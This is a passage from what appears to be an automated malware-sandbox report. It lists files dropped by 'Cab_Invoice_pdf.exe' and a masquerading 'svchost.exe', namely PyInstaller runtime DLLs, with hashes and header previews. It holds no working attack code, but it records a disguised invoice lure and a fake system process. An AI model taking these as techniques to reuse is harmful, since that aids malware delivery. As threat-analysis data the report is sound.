                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.>ua.P&a.P&a.P&h..&m.P&Z.Q'c.P&.c.&`.P&Z.S'c.P&Z.U's.P&Z.T'j.P&..V'`.P&u.Q'c.P&..Q'j.P&a.Q&..P&.U'l.P&.P'`.P&.R'`.P&Richa.P&........................PE..L....^._...........!..............................z.......................................@..........................K...E..............d............................A..T............................B..@............................................text...E........................... ..`.rdata..p...........................@..@.data...H...........................@....gfids..L...........................@..@.rsrc...d...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\select.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):24752
                          Entropy (8bit):6.44568082211825
                          Encrypted:false
                          SSDEEP:384:Tg7oA2vjUzNJmTgj0nq1RiPFdd+k1IumGEKDG4y8cLrhX:ccnvjANJiXnqSdWk1IumGEKDG4yLrhX
                          MD5:404C4F2FF59DA1993518D39754376606
                          SHA1:560A0F8A301EF5FEF541C6CE64975E3AA1AD1460
                          SHA-256:BB4FE62B14AD6FC559A1D88339D0F302450DAFEC09CF6027069F66B6D5BEF1AB
                          SHA-512:585ECF2B3DA37F1144191A70CA7C29151DE3C6BC1943719318BC291B29A08BB7E4A8C6200F8C743DF8BD32225221CADEB8306450B7E491B9B16AA94587711169
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2 ..SN..SN..SN..+...SN.S"O..SN.S"K..SN.S"J..SN.S"M..SN.t!O..SN..8O..SN..SO..SN.t!F..SN.t!N..SN.t!...SN.t!L..SN.Rich.SN.........................PE..L...../`...........!.........&...............0......................................j.....@......................... ;..L...l;..x....`...............D.......p.......6..T............................6..@............0...............................text...]........................... ..`.rdata.......0....... ..............@..@.data........P.......2..............@....rsrc........`.......4..............@..@.reloc.......p.......@..............@..B........................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\ucrtbase.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1142072
                          Entropy (8bit):6.809041027525523
                          Encrypted:false
                          SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                          MD5:D6326267AE77655F312D2287903DB4D3
                          SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                          SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                          SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\unicodedata.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1091248
                          Entropy (8bit):5.360848319038452
                          Encrypted:false
                          SSDEEP:12288:gJz3Q191SnFRHotduNpqQOZ6gBjCmN/X4GyCAx9++bBlhJk93cgewrxEekMGv:gJ3KSogG7hCc/4D9nbDhG2wr0MGv
                          MD5:5FB1A0234305D5B69DB79B4F7F89EBCA
                          SHA1:9A6EF3DD3A024B433566AC20146344A1F0631F9B
                          SHA-256:D9AF40281331CF55E21E20A57342FE86C6C729906D6A3AF3F3F3AD00F2284ABE
                          SHA-512:FE52C0AE494459B8D015E2E28AF92BDCF6A491DC424D803B3E87E21612C4654136335E5399F5CA0FEF4717EECE75D53AC11050623E109E4F7ED59392D74A9085
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c..0..0..0..P0..0w..1..0w..1..0w..1..0w..1..0P..1..0...1..0..0...0P..1..0P..1..0P.<0..0P..1..0Rich..0........................PE..L...../`...........!.....F...B......rF.......`.......................................j....@.........................pv..X....v.......................................q..T...........................@r..@............`..4............................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....rsrc................v..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\win32api.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):104960
                          Entropy (8bit):6.460606710335285
                          Encrypted:false
                          SSDEEP:3072:KloBRQj7JH+VldRcmShLAG9wRcM7RSuQrbCQGt5Ne/eo:KloBa4ncmhWKUu/7t5Nen
                          MD5:2866BF1A085564A0F63B76173943BA64
                          SHA1:CAF810657651B1EC3F667A671E8F9307EEEA98B7
                          SHA-256:3021294B610E01ABD37289DDBE2BF0507E7DE3FCB678E07525EC4E0892747955
                          SHA-512:D1090831BA6D06C09F1DFE2790B435020854E328F9826937244C13CDDB1080CAB35F3679AB34EB44D88F9BECF4CCF933CD2EBE1B5CC853758BFA9BC04B002068
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@...!..!..!..Y..!.....!.....!.....!......!..G..!.....!...C..!..!... ......!......!......!..Rich.!..........................PE..L....^._...........!......................................................................@..........................L......dM..........T...........................`E..T............................D..@...............@...lL..@....................text...*........................... ..`.rdata.............................@..@.data................b..............@....gfids..L............t..............@..@.rsrc...T............v..............@..@.reloc........... ...z..............@..B................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\win32event.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22016
                          Entropy (8bit):5.972372003642818
                          Encrypted:false
                          SSDEEP:384:AkUKkjmkLfkoke6am07BxEjr6p+zDLIkOn/T7AdlF7EpmkteAi5tjVUjaPGaCG:A3KwmwfzkAHUr6uQkG/T7AdlF7Epmktl
                          MD5:29EC0D47B88A465F69B5E18A3D35E1D0
                          SHA1:91739F4227A6DFA4F1F107DD19D01B9E2C90C177
                          SHA-256:9BA207206559F40D534100DF3C847E2A67D8008A8EE98E991D5CD6B0813B8624
                          SHA-512:552F4C4892C453B64CE84D8DBEB9B15E3506A0666867AF5CFB28C6B167E2C81F8EED0A8598DEEBB38C90D0B2CCBEC69223C2D487256541D041D85B2F0FDC871D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?&+.{GE.{GE.{GE.r?...GE.@.D.yGE.@.F.zGE.@.@.qGE.@.A.pGE...D.yGE.o!D.yGE..%D.~GE.{GD.(GE...@.zGE...E.zGE...G.zGE.Rich{GE.........................PE..L....^._...........!.....*...(.......*.......@............................................@..........................M..T....N..........\............................I..T...........................HJ..@............@..h............................text....(.......*.................. ..`.rdata..N....@......................@..@.data...H....`.......H..............@....gfids.......p.......J..............@..@.rsrc...\............L..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\win32gui.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):176128
                          Entropy (8bit):6.424412252153223
                          Encrypted:false
                          SSDEEP:3072:uVvRKIA/oqLcDwPY5Fej7oLyqx9NkdMiCawrLwCNzR0jzlZ+6KLDtW8d7U:6RNA/oqLcDwPY5FeCNkdMiCasvRIK6KE
                          MD5:844D345409407D3C470219342EFBD80C
                          SHA1:70612D8676009CC780ABE61583996473F027334A
                          SHA-256:42898717D0D574B6C4BEAD3C07A67368FCBFC49F498997A3A08E24612F4EF365
                          SHA-512:8A54414DA2D72331441AE5F47690F91C676ED6CD2B96B57AAE783774E5A1FE03F225DDD1DFDAE77E93897E3AE3DA7609A99448184C6BB1D92D3D600BAD17D7A4
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r..r..r..r.....r..,..r..,..r..,..r..,..r...,..r.....r......r..r...s...,..r...,..r...,..r..Rich.r..........................PE..L....^._...........!......................................................................@..........................3..h....3..........T........................:...*..T...........................H+..@............................................text...N........................... ..`.rdata..j...........................@..@.data...X ...`.......P..............@....gfids..L............n..............@..@.rsrc...T............p..............@..@.reloc...:.......<...t..............@..B................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\Include\pyconfig.h
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:C source, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):21096
                          Entropy (8bit):5.30196060437062
                          Encrypted:false
                          SSDEEP:384:rG3tApdkHRMYURIn1/8BsRV4ig8as8Ji2MgsdgTaXgDV:rG3tApWySE+aPfZXvV
                          MD5:31FEF4BD7506D25D27BF596F949A2066
                          SHA1:41F1D3A07B331220DAEA0B106D29D2A2DB74B45E
                          SHA-256:12347EF4F8CA786D33CAC569DDF61ACBDC506F986D1AA34F3BAAD8C062543DD3
                          SHA-512:062A1EF84DB04D91810CF81604A23E5226326E0BAD0B66077A22D05AC3EF6A06B36EFEBC0552FE2C0FAA17221275E95E77D11B952A29B6D3C3DB144622336B77
                          Malicious:false
                          Reputation:unknown
                          Preview: #ifndef Py_CONFIG_H..#define Py_CONFIG_H..../* pyconfig.h. NOT Generated automatically by configure.....This is a manually maintained version used for the Watcom,..Borland and Microsoft Visual C++ compilers. It is a..standard part of the Python distribution.....WINDOWS DEFINES:..The code specific to Windows should be wrapped around one of..the following #defines....MS_WIN64 - Code specific to the MS Win64 API..MS_WIN32 - Code specific to the MS Win32 (and Win64) API (obsolete, this covers all supported APIs)..MS_WINDOWS - Code specific to Windows, but all versions...Py_ENABLE_SHARED - Code if the Python core is built as a DLL.....Also note that neither "_M_IX86" or "_MSC_VER" should be used for..any purpose other than "Windows Intel x86 specific" and "Microsoft..compiler specific". Therefore, these should be very rare.......NOTE: The following symbols are deprecated:..NT, USE_DL_EXPORT, USE_DL_IMPORT, DL_EXPORT, DL_IMPORT..MS_CORE_DLL.....WIN32 is still required for the locale modul
                          C:\Users\user\AppData\Local\Temp\_MEI61562\VCRUNTIME140.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):76168
                          Entropy (8bit):6.781149490150774
                          Encrypted:false
                          SSDEEP:1536:zgTqURG2vo0RwvI7sjBH+cOKXc36r23oEecbi0mju:zdURhvZ6vIQVrPypecbi0m
                          MD5:87DD91C56BE82866BF96EF1666F30A99
                          SHA1:3B78CB150110166DED8EA51FBDE8EA506F72AEAF
                          SHA-256:49B0FD1751342C253CAC588DDA82EC08E4EF43CEBC5A9D80DEB7928109B90C4F
                          SHA-512:58C3EC6761624D14C7C897D8D0842DBEAB200D445B4339905DAC8A3635D174CDFB7B237D338D2829BC6C602C47503120AF5BE0C7DE6ABF2E71C81726285E44D6
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ix..-...-...-....|./...$a..&...-.......h..>...h..8...h..1...h..,...hl.,...h..,...Rich-...................PE..L....._.........."!.........................................................@......{.....@A......................................... ...................#...0..x....#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc..x....0......................@..B........................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_asyncio.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):57520
                          Entropy (8bit):6.4179566473980465
                          Encrypted:false
                          SSDEEP:1536:0iULU9Lbx5udbmDoOTXPnbhyBDmuo2iwBIuYncjNayr:0i4MLLbhamuo2iwBIuYncj3
                          MD5:54414D216C4DEA54799DC0F5CE657FBE
                          SHA1:0043CFCAE73985C7739ABDF6DBB0E4291EFDB5D2
                          SHA-256:CEF9A3D83E7CC45D99D666A6F8E7E58CC68ACB14E8858FE5BC6ED54A0F7C3898
                          SHA-512:F3CB7C8D38E59EB8F9A1CF693AD032FD560B4CCCB604B11C1BAE837FE045591C969A7E1EDF35F1BA9546EEF0E3C5D0D70188393B3C656B91ED95736AFC8A5358
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...%..%..%....%...$..%... ..%...!..%...&..%.<.$..%.$..%..$...%.<.-..%.<.%..%.<....%.<.'..%.Rich..%.........PE..L...../`...........!.....^...f.......].......p.......................................R....@.............................P...0...d...............................H...8...T...............................@............p...............................text....\.......^.................. ..`.rdata...8...p...:...b..............@..@.data...............................@....rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_bz2.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):79536
                          Entropy (8bit):6.643809455301382
                          Encrypted:false
                          SSDEEP:1536:02MfT59id2pNXdCQXa64t3oS8bOWUwXpIuMVwqJyb:0T/5pNXdFa6llbOWUwXpIuMVwq0
                          MD5:445CE6BCEFB6EDDF0D953DBA17E0B320
                          SHA1:3D5FB5EEC6ECA27D37CAAE31F173DFD53909C74C
                          SHA-256:CF721704D96F071DE10A1E174A07BB1211864EA588CE1C4D6023F11701AAAB13
                          SHA-512:31B2247CB06C1905AE6857CC6FC23A9FC5E1C4FB7E76229D7444B417353A3EC76412DE73FF08750C09F5D1AD8644B8C07D79B3820E594AFE997DC733F610AA41
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4..g..g..g..xg..gx..f..gX,,g..gx..f..gx..f..gx..f..g_..f..g...f..g..g...g_..f..g_..f..g_..g..g_..f..gRich..g........................PE..L...../`...........!.........N......y........................................P......2^....@......................... ...H...h........0.......................@......x...T...............................@............................................text...Y........................... ..`.rdata..n1.......2..................@..@.data...8.... ......................@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_ctypes.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):117424
                          Entropy (8bit):6.568932798472365
                          Encrypted:false
                          SSDEEP:1536:UhnXb10JQfHRFDrz2EH7EHURqBcNVValsffwv3TuLlbuRB/FfZWxOSQKkx1IuBPO:UhnLAI5xVVals3Py/FZWobKU1IuBPxEP
                          MD5:286CE553108A74197DF006D71D31918F
                          SHA1:01A9FDE2833F2FC684A442169480ECFC8F1559D0
                          SHA-256:13A45B718DF8CB4C0218F720C396973F8A501678C6CB6EF9380730C97553EE8C
                          SHA-512:3CA8AB25B4B069C702E02226623C0CEA55CDB7EC3FEEA50C81A0A2350BDCB9B5BB2C2D7768C810743024EA99568F20DF51ACC4AF28DAACDE0AF18F0F5D6B7A1F
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S<...]...]...]...%o..]..,...]..,...]..,...]..,...]../...]...6...]...6...]..4...]...]...]../...]../...]../...]../...]..Rich.]..................PE..L...../`...........!.........................0......................................6.....@..........................f......Dg..................................l....b..T...........................hb..@............0...............................text............................... ..`.rdata..~N...0...P..................@..@.data.... ...........f..............@....rsrc...............................@..@.reloc..l...........................@..B................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_decimal.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):228528
                          Entropy (8bit):6.825703510403188
                          Encrypted:false
                          SSDEEP:6144:vISxoQN8s3Hs6B+ruCQxuqaxV3XMW5gVrserORH0i:vISxoS8s3HSruCQ6userOhv
                          MD5:DD8724365CDF7372892B0220BC8007C0
                          SHA1:0C43CFABCD2FD710432C7E76CF58CFEDE05F9069
                          SHA-256:FF753B671FE3A1D09B4676A0E08F85A4B19D0F5DD06B50DCA31339911730F343
                          SHA-512:42AF80495E1FA96A438ECE00D896D02BF3249BC4832CB182511384DB438A41F07A54A6F3F03FD992F32901A4D684E66EF337BA379CB0C9245A621CD04DB26B0D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.}c...c...c...j.@.m....../a....../o....../i....../g....../`...w../a...c........../l....../b.....,.b....../b...Richc...................PE..L...../`...........!................w.....................................................@......................... ...P...p........P...............`.......`..D!......T...............................@............................................text...Q........................... ..`.rdata..............................@..@.data........0....... ..............@....rsrc........P.......2..............@..@.reloc..D!...`..."...>..............@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_hashlib.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):39088
                          Entropy (8bit):6.576705962671287
                          Encrypted:false
                          SSDEEP:768:cAtCkdtp99Be3oOQi2ApPXl/mr/2IBIuYIBpLDG4y2jha:cAckdtp9/2oOQi3pfVm/2IBIuYIZyt
                          MD5:76A7E9C182FB34121881B868829786E5
                          SHA1:40392A3BAD97AA8C7C7C7ADD34A59F170E917747
                          SHA-256:D6F37E0BC993D76BFD3D8F28963E0936D893C3EA1B6A4B2ABCB06A053FF0BB94
                          SHA-512:4CE0AD1149F6A2619DFA17DDFC46AE3ECBE18A2A111A3457DF99B84B6F8768FCDB6470C3B0F93C08D43B06218C56EC19C7D21A6D4AEEB86F98A51DBCBCBBEC7D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-.DUi.*.i.*.i.*.`...k.*..+.k.*../.b.*....c.*..).h.*...+.k.*.}.+.k.*..+.j.*.i.+...*...".h.*...*.h.*.....h.*...(.h.*.Richi.*.........PE..L...../`...........!.....>...>......H=.......P............................................@.........................`e..P....e..x....................|..........p....`..T...........................8a..@............P...............................text....<.......>.................. ..`.rdata... ...P..."...B..............@..@.data...P............d..............@....rsrc................h..............@..@.reloc..p............t..............@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_lzma.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):159408
                          Entropy (8bit):6.960223316470766
                          Encrypted:false
                          SSDEEP:3072:wV3Rr96Jf12nMU7gc22JNO2cUDQoxXChHALHuki4zHfBg9mNoaCmERoTpIuD1qyO:+hkFPMrxyhHALHEOpgYObdRoT0R
                          MD5:45D91843D03A51354A43D8DCECDF22E1
                          SHA1:C982DCDCEE7B2D64AEAA478D8FFE0087B64E391D
                          SHA-256:DB9ABC004E8DA4511025E47A255727CB45111195C6AEB6D50B61A037D7408D0A
                          SHA-512:34A13E0445499F7B655C40D9431710FDCCF1BFDA1C7477F23481E7C42526284736714ED38949F91098131F80B635631E3A0BA73DD3734D4E0759EE7F32968364
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......YEy..$.Q.$.Q.$.Q.\.Q.$.Q.U.P.$.Q.U.P.$.Q.U.P.$.Q.U.P.$.Q.V.P.$.Q.O.P.$.Q.$.Q@$.Q.V.P'$.Q.V.P.$.Q.V.Q.$.Q.V.P.$.QRich.$.Q................PE..L..../`...........!................h........................................p......?.....@..........................4..L....4..x....P...............R.......`.. ...(0..T............................0..@............................................text............................... ..`.rdata.............................@..@.data...`....@.......4..............@....rsrc........P.......8..............@..@.reloc.. ....`.......D..............@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_multiprocessing.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):26800
                          Entropy (8bit):6.4189500308991985
                          Encrypted:false
                          SSDEEP:384:p6hMLUifrlrCojAelk6WPw6DsuOZRIuABLipJXj0DG4y8V5OB8hU:7lr9WY298RIuAtin0DG4ymFhU
                          MD5:DBEC7953A3000BB513B26A26F6C1128D
                          SHA1:B4CBF27FAB8DF534BE31D021E4C49C42161D4CBF
                          SHA-256:307046C4F970F910968EDDC6CB9B65767FA3A70C05AA966DD6434021FEEEBDDC
                          SHA-512:2C4D84F5D27E2EB84C1867223C147AB7B5F3C0B72671A5FBCC5936B3449D683AEBD7D3D2F07B4F4203E5D6523F0BD3F8314773567D5FB6FD7262A3CEBC84D20F
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\.t.=.'.=.'.=.'.Eu'.=.'.L.&.=.'.L.&.=.'.L.&.=.'.L.&.=.'6O.&.=.'.V.&.=.'.=.'.=.'6O.&.=.'6O.&.=.'6O.'.=.'6O.&.=.'Rich.=.'........................PE..L...../`...........!................}........0......................................>.....@.........................p:..`....:..x....`..(............L.......p.......5..T............................6..@............0..\............................text............................... ..`.rdata..`....0......."..............@..@.data...0....P.......6..............@....rsrc...(....`.......:..............@..@.reloc.......p.......F..............@..B........................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_overlapped.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):40112
                          Entropy (8bit):6.515613246434881
                          Encrypted:false
                          SSDEEP:768:iW1TpulXdyBdthIw5o8IYkITWb7PkNIuttgHDG4y5Eh8i:EXdyBdRTTWb7PkNIuttghydi
                          MD5:4E5C64134B6C40E187B7F8627A6D8A2D
                          SHA1:F5C6AFFAB5A1D14D8B586A1893E136D87DDAAD75
                          SHA-256:5EEF3EB8F87D332128569E4810F9283FF57417F1BB67D59D1AB2F471505DC1B1
                          SHA-512:7D6783D20AEC060BB1D5C72FADC8D52EF6812EE0776851C96FA2AD21B66C9FA853F5F43B8B775C8A741BD2B35938E2FCCAC16A829E37F7C425978C59BA62B60B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.SP..=...=...=.......=...<...=...8...=...9...=...>...=...<...=...;...=...<...=...<.v.=...5...=...=...=.......=...?...=.Rich..=.................PE..L...../`...........!.....>...B.......<.......P......................................|.....@.........................0i..X....i.......................................d..T............................d..@............P...............................text...2<.......>.................. ..`.rdata...$...P...&...B..............@..@.data...,............h..............@....rsrc................l..............@..@.reloc...............x..............@..B........................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_queue.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):26288
                          Entropy (8bit):6.44734679501627
                          Encrypted:false
                          SSDEEP:768:XH9qUbFuF16rtrazup1IumUYllDG4yzFhj:3AUbFYktrazup1IumUYlvyH
                          MD5:963DD36AEC3EDB74C533B91C5A37498E
                          SHA1:5B553F18630F25C52A41BED0AC9C6262CCA662DA
                          SHA-256:D0E208BF308030C4BF879BA2A17FBEED48E10DD76C0DBDC9EB3D5F7A990302F6
                          SHA-512:513438B82C62BF26079BFD42CF6C562F7DF02A3190B246D9FB32B4342766C27EB77DEF8DE8D748B71C483CEC2B88DD9EDAE367ABFE8C157D135A259A8D859D48
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..|&.|&.|&....|&...'.|&...#.|&...".|&...%.|&.<.'.|&..'.|&.|'..|&.<...|&.<.&.|&.<...|&.<.$.|&.Rich.|&.................PE..L...../`...........!.........,...............0.......................................:....@..........................<..L...,=..d....`...............J.......p..\...X8..T............................8..@............0...............................text............................... ..`.rdata..b....0......."..............@..@.data...t....P.......8..............@....rsrc........`.......:..............@..@.reloc..\....p.......F..............@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_socket.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):69808
                          Entropy (8bit):6.611317372453449
                          Encrypted:false
                          SSDEEP:1536:+NU6t0wKLlEIOiKISMD9f8+LeJzJbHjW/Z1IuBwC8lYHy/:+NPt0wKLlfkMD9f8ueJdbHi/Z1IuBwpL
                          MD5:FB09559F0C1C4DC91DFBE361828B0E39
                          SHA1:E38A5B68F38E6FFF3C276CEA2B40620B33295879
                          SHA-256:5EC25AD36306076275E094FCE70E150C632B193C916847535DF3904545F879F0
                          SHA-512:6D9BAE50E82F0B57240EFA2E637DE01C16CF1AEAAF95DD9F4B3DDF391CE163D140C06549243EF8D370D76A866190A49A1C1D8E8C0177CE8A709C574A1220E86C
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3...]...]...]......].D.\...].D.X...].D.Y...].D.^...].c.\...]...\...]...\.J.].c.U...].c.]...].c.....].c._...].Rich..].................PE..L...../`...........!.....r..........Kq....................................... ............@......................... ...P...p...................................L.......T...............................@............................................text....p.......r.................. ..`.rdata...].......^...v..............@..@.data...@...........................@....rsrc...............................@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_ssl.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):143024
                          Entropy (8bit):6.46611957726107
                          Encrypted:false
                          SSDEEP:3072:Z8wJl2IslifCkaWuNPTTT/TpvdSRyOvm5GgDdhpIuM7GHux3P:Zpl2IsMDuTT/T/SRMGgDrqx
                          MD5:50F9B63B7632255FE69ABE0C2B4FAE04
                          SHA1:623BB9731CC5AA99EEB7C28DDF949495B0501717
                          SHA-256:0A7786AD8A9D4A24BD84B520BB7A8862DF949ABFCF10027172AAF0E3A18EDE7A
                          SHA-512:B35536AD316D7FABF7617451F9A4AC2088A473A97E8E023BB7AB55C50707ED9E7B3CAC2C72CE98A5F6D2CC56DF2A5D5A6B149110994006F76937BC22644D9273
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............n..n..n......n.V.o..n.V.k..n.V.j..n.V.m..n.q.o..n.M.o..n...o..n..o...n.q.f..n.q.n..n.q..n.q.l..n.Rich.n.........................PE..L...../`...........!.........N......h........................................P......V`....@.............................d...D................................ ...#..H...T...............................@............................................text...,........................... ..`.rdata..............................@..@.data....I.......H..................@....rsrc...............................@..@.reloc...#... ...$..................@..B................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\_win32sysloader.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):11776
                          Entropy (8bit):5.256625843110757
                          Encrypted:false
                          SSDEEP:192:U48hFSvy3GI5DBb7qqAcUkOJk4fgF6O/G9RdfzaYy/o:sq8zb7DAcUkOJF3O/8I/
                          MD5:D9026D178C4220AA2C40CA592E31F5C6
                          SHA1:1EDD3463DA5AB5B442FCFBFB4E9A70940B7A5A76
                          SHA-256:D5E2378B9028810872ADE3AD7591B716466EAE621CA5B6FFFB4822949A9ABF9A
                          SHA-512:00251232772E5BAAF314DE7E8263229094D4057763620A3C929623E3C93CD30C8FA5243015434318CA9A4DFA8F2E82F9519AB6CF55F232D97296F0B5F93D376B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._aS...=...=...=..x....=. ^<...=.hb<...=. ^>...=. ^8...=. ^9...=..f<...=...<.8.=.^8...=.^=...=.^?...=.Rich..=.........................PE..L....^._...........!.........................0....;.......................................@.........................@5..`....5..d....`..l....................p......`1..T............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@......."..............@....gfids.......P.......$..............@..@.rsrc...l....`.......&..............@..@.reloc.......p.......*..............@..B........................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-console-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
